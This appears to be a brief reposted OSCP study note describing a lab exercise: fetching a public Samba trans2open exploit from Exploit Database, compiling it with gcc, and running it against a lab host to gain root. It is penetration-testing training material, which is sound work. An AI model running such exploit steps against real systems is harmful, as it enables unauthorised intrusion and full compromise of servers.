标签:arch nload rom base roo targe root data exe
Compiling an Exploit
Exercise: samba exploit
1. Search and download the samba exploit source code from Exploit Database.
https://www.exploit-db.com/exploits/10
2. Compile the source code.
gcc 10.c -o trans2open
3. Use the trans2open tool to exploit the target server. Root the target server sucessfully.
./trans2open -b 0 10.0.0.20
OSCP Learning Notes - Exploit(2)
标签:arch nload rom base roo targe root data exe
原文地址:https://www.cnblogs.com/keepmoving1113/p/11143589.html